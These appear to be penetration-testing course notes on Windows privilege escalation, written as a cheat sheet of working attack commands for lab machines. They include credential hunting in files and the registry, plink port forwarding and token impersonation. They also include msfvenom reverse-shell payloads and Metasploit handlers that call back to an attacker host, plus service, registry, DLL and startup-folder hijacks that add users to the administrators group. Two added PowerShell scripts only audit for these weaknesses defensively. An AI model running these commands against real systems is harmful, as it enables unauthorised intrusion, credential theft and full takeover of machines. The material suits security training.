Windows Privilege Escalation

For this we already need a foothold on the target, i.e. any kind of shell on a machine inside the network.

Resources:

  1. Please see the attached link for a list of all resources used in the course. A very special thanks goes to Grimmie for putting this together! <3

    https://github.com/Gr1mmie/Windows-Priviledge-Escalation-Resources

Initial Enumeration

#System Enumeration
systeminfo
systeminfo | findstr /b /c:"OS Name" /c:"OS Version" /c:"System Type"
wmic qfe
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic logicaldisk
wmic logicaldisk get caption,description,providername
wmic logicaldisk get caption

#User Enumeration
whoami
whoami /priv
whoami /groups
net user    #to view users on this machine
net user <username>
net localgroup
net localgroup <group_name>

#Network Enumeration
ipconfig
ipconfig /all
arp -a
route print
netstat -ano

#Password Hunting
findstr /si password *.txt
findstr /si password *.txt *.ini *.config

#AV Enumeration
sc query windefend
sc queryex type= service
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config

Automated Tool for Enumeration

#WinPEAS - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
#Winpeas - https://github.com/carlospolop/PEASS-ng/releases/tag/20230129
#Windows PrivEsc Checklist - https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
#Sherlock - https://github.com/rasta-mouse/Sherlock
#Watson - https://github.com/rasta-mouse/Watson
#PowerUp - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
#JAWS - https://github.com/411Hall/JAWS
#Windows Exploit Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester
#Metasploit Local Exploit Suggester - https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/
#Seatbelt - https://github.com/GhostPack/Seatbelt
#SharpUp - https://github.com/GhostPack/SharpUp
#Download WinPEAS, place it on the victim machine, then run it
winPEASany.exe
#Run in meterpreter session
pwd
cd c:\\windows\\tmp
upload WinPEAS.exe    #WinPEAS needs to be downloaded on the attacker machine first
#now drop into a Windows shell
shell    #(or) load powershell
#running winpeas
WinPEAS.exe
#Opening powershell via CMD
powershell -ep bypass

#using the metasploit exploit suggester; it lists candidate kernel exploits, note them down for the exploitation step
post/multi/recon/local_exploit_suggester

#using the exploit suggester from github
#https://github.com/AonCyberLabs/Windows-Exploit-Suggester
#download it and run it
./windows-exploit-suggester.py --update
pip install xlrd --upgrade    #if any error occurs try: curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py; python get-pip.py
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt    #here systeminfo.txt is the systeminfo output saved from the victim
#It lists candidate kernel exploits; note them down for the exploitation step

Kernel Exploits

#Windows Kernel Exploits - https://github.com/SecWiki/windows-kernel-exploits
#Using Metasploit
#Take the kernel exploits suggested by the previous technique and try them one after another
#Try each exploit a few times; one of them should return a shell
getuid    #to know the current privileges in meterpreter, e.g. NT AUTHORITY\SYSTEM
whoami    #to know the current privileges in windows, e.g. NT AUTHORITY\SYSTEM

#Using Manual
#Take the kernel exploits suggested by the previous technique and try them one after another
#check the different repositories for better usage info on each exploit
#EX: Churraskito_exe <ip_add_of_attacker> <attacker_port>    #we need to have a netcat listener on the attacker machine while running this

Passwords and Port Forwarding

#Check for passwords stored
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

#Port forwarding to reach open ports that are only listening on the internal network
#Plink Download - https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
#Download plink and place it on the victim windows machine using http.server and certutil
service ssh start    #attacker machine
plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.x.x    #victim machine
#now check that the port forward is up (attacker machine)
netstat -ano | grep 445
#If we have credentials we connect using winexe
winexe -U Administrator%Welcome1! //127.0.0.1 "cmd.exe"
#now we can reach port 445 through the forwarded port on the attacker machine, e.g. with psexec.py

Windows Subsystem for Linux

#https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
#Escalation via WSL
where /R C:\windows bash.exe
where /R C:\windows wsl.exe
bash.exe
#spawning tty shell
#just google "spawning tty shell cheat sheet"
#https://rcenetsec.com/shell-spawning/
history
psexec.py marvel.local/fcastle:Password1@192.168.x.x
#or
smbexec.py marvel.local/fcastle:Password1@192.168.x.x
#or
wmiexec.py marvel.local/fcastle:Password1@192.168.x.x
#Note: start with smbexec -> wmiexec -> psexec

Impersonation and Potato Attacks

#https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---impersonation-privileges
#potato attacks
#Rotten Potato - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
#Juicy Potato - https://github.com/ohpe/juicy-potato
whoami /priv    #if SeImpersonatePrivilege is enabled this attack is possible, see the links above for more info
#Token Impersonation with Incognito
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami
#If any error occurs try this command
rev2self

#Alternate Data Streams
#Alternate Data Streams - https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
dir /R
more < <file_name>:<stream_name>    #read the hidden stream shown by dir /R

getsystem

#What happens when I type getsystem? - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
#Run in meterpreter session
getsystem
getsystem -h

RunAs

cmdkey /list
C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Administrator\Desktop\root.txt > C:\Users\security\root.txt"

Registry

#https://www.aldeid.com/wiki/TryHackMe-Windows-PrivEsc-Arena
#Enumerate Autoruns
#PowerUp (best one)
. .\PowerUp.ps1    #Run on powershell
Invoke-AllChecks
#autorun
#Download the Sysinternals Suite and run the Autoruns tool
Autoruns64.exe
#access check
accesschk.exe -wvu "C:\Program Files\Autorun Program"

#Escalation via Autorun
#Now create a msfvenom payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.x.x lport=443 -f exe -o program.exe
#Now listen on attacker machine
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp # has to be exactly the same!
set lhost 10.10.x.x
set lport 443
run
#now replace the original program with the payload, transferring it using http.server
#when the program runs as administrator, we get a shell with administrator privileges

#AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer    #From the output, notice that “AlwaysInstallElevated” value is 1.
reg query HKCU\Software\Policies\Microsoft\Windows\Installer    #From the output, notice that “AlwaysInstallElevated” value is 1.
Write-UserAddMSI    #This is the PowerUp abuse function mentioned in the Invoke-AllChecks output
#Now run the add-user MSI created in the PowerUp folder to create a user
#Another way
#Create a msfvenom payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.x.x lport=443 -f msi -o setup.msi
#Now listen on attacker machine
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp # has to be exactly the same!
set lhost 10.10.x.x
set lport 443
run
#Another way
use exploit/windows/local/always_install_elevated
set session 1
run

#regsvc ACL (need more clarity and need to complete steps)
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl    #Notice that the output shows a user in the “NT AUTHORITY” group with “FullControl” permission over the registry key.
#Exploiting
#Copy ‘C:\Users\User\Desktop\Tools\Source\windows_service.c’ to the Kali VM
pip3 install pyftpdlib
python -m pyftpdlib -p 21 --write
#Now run below command in powershell
ftp 10.10.x.x
put windows_service.c
#Now replace whoami command with below command
cmd.exe /k net localgroup administrators user /add
#Now compile this file
apt install gcc-mingw-w64
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
#Place x.exe in C:\Temp
#Run below command in cmd
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
sc start regsvc
#To check user was added use below command
net localgroup administrators
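A read-only audit for the two registry conditions this section abuses (the AlwaysInstallElevated policy and a service key whose ACL lets a broad principal rewrite ImagePath). This is an added example, not code from the course or from PowerUp, and it assumes it runs on the Windows host as the low-privileged user whose effective access you want to see:

```powershell
# Added audit script (not from the course notes): read-only checks for the two
# registry conditions exploited in this section. Assumed to run on the host as
# the low-privileged user whose effective access is being measured.

function Test-AlwaysInstallElevated {
    # MSI packages run as SYSTEM only when BOTH policy values are 1.
    $base = 'Software\Policies\Microsoft\Windows\Installer'
    $hklm = (Get-ItemProperty -Path "HKLM:\$base" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    $hkcu = (Get-ItemProperty -Path "HKCU:\$base" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    return ($hklm -eq 1 -and $hkcu -eq 1)
}

function Get-WeakServiceKeyAcl {
    # Service keys where a broad principal may rewrite ImagePath or add subkeys,
    # the condition behind the regsvc steps above. Generic-rights ACEs show up
    # as numbers and are skipped here; confirm hits with accesschk or Get-Acl | fl.
    $broad = 'Everyone|BUILTIN\\Users|Authenticated Users|INTERACTIVE'
    $weak  = 'FullControl|SetValue|CreateSubKey|WriteKey|ChangePermissions|TakeOwnership'
    Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
      ForEach-Object {
        $key = $_
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { return }   # key not readable by this user
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -eq 'Allow' -and
                $ace.IdentityReference.Value -match $broad -and
                "$($ace.RegistryRights)" -match $weak) {
                [pscustomobject]@{
                    Service   = $key.PSChildName
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.RegistryRights
                }
            }
        }
      }
}

if (Test-AlwaysInstallElevated) {
    'AlwaysInstallElevated is 1 in both HKLM and HKCU: any user can install an MSI as SYSTEM'
}
Get-WeakServiceKeyAcl | Format-Table -AutoSize
```

Any service listed is one whose ImagePath a standard user can redirect, which is exactly the hardening gap to close (or the finding to report).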

Executable Files

#https://www.aldeid.com/wiki/TryHackMe-Windows-PrivEsc-Arena
#Enumeration
#PowerUp (best one)
. .\PowerUp.ps1    #Run on powershell
Invoke-AllChecks
#Open command prompt and type: 
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
#Notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the “filepermservice.exe” file.

#Exploitation
#place the x.exe file previously generated in victim machine with name filepermservice.exe
#save the file in "c:\Program Files\File Permissions Service\filepermservice.exe" and run below command
sc start filepermsvc
#To check user was added use below command
net localgroup administrators

Startup Applications

#https://www.aldeid.com/wiki/TryHackMe-Windows-PrivEsc-Arena#[Task_6]_Service_Escalation_-_Executable_Files
#icacls Documentation - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls
#Enumeration
where /R C:\windows icacls.exe
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
#From the output, notice that the “BUILTIN” group has full access ‘(F)’ to the directory.

#Exploitation
#Start a listener
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost [Kali VM IP Address]
run
#Generate a payload 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
#now place this file in victim machine
#Place x.exe in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup.
#Logoff and Login with the administrator account credentials then you will get the shell

DLL Hijacking

#open Procmon and configure filters as shown below
#Process Name : is : dllsvc
#path : ends with : .dll
#Result : is : NAME NOT FOUND
#Now run below commands
sc stop dllsvc
sc start dllsvc
#you can notice few paths in process monitor which can be exploited

#Exploiting
#Copy ‘C:\Users\User\Desktop\Tools\Source\windows_service.c’ to the Kali VM
pip3 install pyftpdlib
python -m pyftpdlib -p 21 --write
#Now run below command in powershell
ftp 10.10.x.x
put windows_service.c
#Now replace whoami command with below command
cmd.exe /k net localgroup administrators user /add
#Now compile this file
apt install gcc-mingw-w64
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
#Now place the file in victim machine in the path we got in procmon
#now stop and start the service again
sc stop dllsvc
sc start dllsvc

Service Permissions (Paths)

#https://www.aldeid.com/wiki/TryHackMe-Windows-PrivEsc-Arena#[Task_6]_Service_Escalation_-_Executable_Files

#Escalation via Binary Paths
#Enumeration
#PowerUp (best one)
. .\PowerUp.ps1    #Run on powershell
Invoke-AllChecks
#Manual Enumeration
accesschk64.exe -wuvc everyone *
accesschk64.exe -wuvc <name>    #EX: accesschk64.exe -wuvc daclsvc
#Notice that the output suggests that the user “User-PC” has the “SERVICE_CHANGE_CONFIG” permission.
#Exploitation
sc qc <name>    #sc qc daclsvc
sc config <name> binpath= "net localgroup administrators user /add"    #sc config daclsvc binpath= "net localgroup administrators user /add"    (note the space after binpath=)
sc start <name>    #sc start daclsvc
#To check user was added use below command
net localgroup administrators

#Escalation via Unquoted Service Paths
#Enumeration
#PowerUp (best one)
. .\PowerUp.ps1    #Run on powershell
Invoke-AllChecks
#Manual Enumeration
sc qc unquotedsvc
#Exploitation
#Start a listener
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost [Kali VM IP Address]
run
#Generate a payload 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o common.exe
#Place common.exe in C:\Program Files\Unquoted Path Service
#Open command prompt and type: 
sc start unquotedsvc
#To check user was added use below command
net localgroup administrators
#Steel Mountain TryHackMe walkthrough
#https://systemweakness.com/steel-mountain-tryhackme-walkthrough-552021de9159
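A read-only audit that looks for the same conditions as the accesschk and PowerUp checks in this section and in the Executable Files section above: a service binary that a broad principal can overwrite, and an unquoted ImagePath with spaces where one of the directories searched first is writable. The same ACE test applies to the Startup folder. This is an added example, not code from the course or from PowerUp, and assumes it runs on the host as an ordinary user:

```powershell
# Added audit script (not from the course notes or PowerUp). Assumed to run on the
# Windows host as a normal user; Win32_Service and Get-Acl need no admin rights.
$Broad = 'Everyone|BUILTIN\\Users|Authenticated Users|INTERACTIVE'
$WriteBits = 'FullControl|Modify|Write|CreateFiles|WriteData|AppendData|CreateDirectories|ChangePermissions|TakeOwnership'

function Test-BroadWrite([string]$Path) {
    # True when an Allow ACE that applies to the object itself grants a broad
    # principal write-class rights. Inherit-only ACEs are ignored; BUILTIN\Users
    # still match on C:\ (they may create folders there), so verify hits with icacls.
    $acl = Get-Acl -Path $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            "$($ace.PropagationFlags)" -notmatch 'InheritOnly' -and
            $ace.IdentityReference.Value -match $Broad -and
            "$($ace.FileSystemRights)" -match $WriteBits) { return $true }
    }
    return $false
}

function Get-UnquotedCandidates([string]$PathName) {
    # For an unquoted path with spaces, the executables Windows would try before
    # the real one (C:\Program.exe, C:\Program Files\Unquoted.exe, ...).
    if ($PathName.StartsWith('"')) { return @() }
    $exe = ($PathName -split '\.exe')[0] + '.exe'
    if ($exe -notmatch ' ') { return @() }
    $parts = $exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) { ($parts[0..($i - 1)] -join ' ') + '.exe' }
}

function Get-ServicePathFindings {
    Get-CimInstance -ClassName Win32_Service | Where-Object { $_.PathName } | ForEach-Object {
        $svc = $_
        $exe = ($svc.PathName.Trim('"') -split '\.exe')[0] + '.exe'   # strip quotes and arguments
        $issues = @()
        if (Test-BroadWrite $exe) { $issues += "binary writable: $exe" }
        foreach ($c in Get-UnquotedCandidates $svc.PathName) {
            if (Test-BroadWrite (Split-Path -Path $c -Parent)) { $issues += "unquoted path, dir writable: $c" }
        }
        if ($issues.Count) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Issues = ($issues -join '; ') }
        }
    }
}

Get-ServicePathFindings | Format-Table -AutoSize -Wrap
```

A service in the output that runs as LocalSystem is the case the steps above exploit; the fix is to quote the path and tighten the ACL on the binary and its directories.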

#CVE-2019-1388
#Zero Day Initiative CVE-2019-1388 - https://www.youtube.com/watch?v=3BQKpPNlTSo
#Blaster walkthrough -TryHackMe
#https://infosecwriteups.com/blaster-walkthrough-tryhackme-f44f0adb6814?gi=bbc617d1436c

#Capstone
#Hack the Box (HTB) machines walkthrough series — Arctic
#https://resources.infosecinstitute.com/topic/hack-the-box-htb-machines-walkthrough-series-arctic/
#HTB Bastard Walkthrough
#https://systemweakness.com/htb-bastard-walkthrough-144d895da08e
#TryHackMe — Alfred Walkthrough
#https://clarencesubia.medium.com/tryhackme-alfred-walkthrough-6c8823b72d02
#Hack the Box (HTB) machines walkthrough series — Bastion
#https://resources.infosecinstitute.com/topic/hack-the-box-htb-walkthrough-bastion/
#Querier HackTheBox Walkthrough
#https://www.hackingarticles.in/querier-hackthebox-walkthrough/
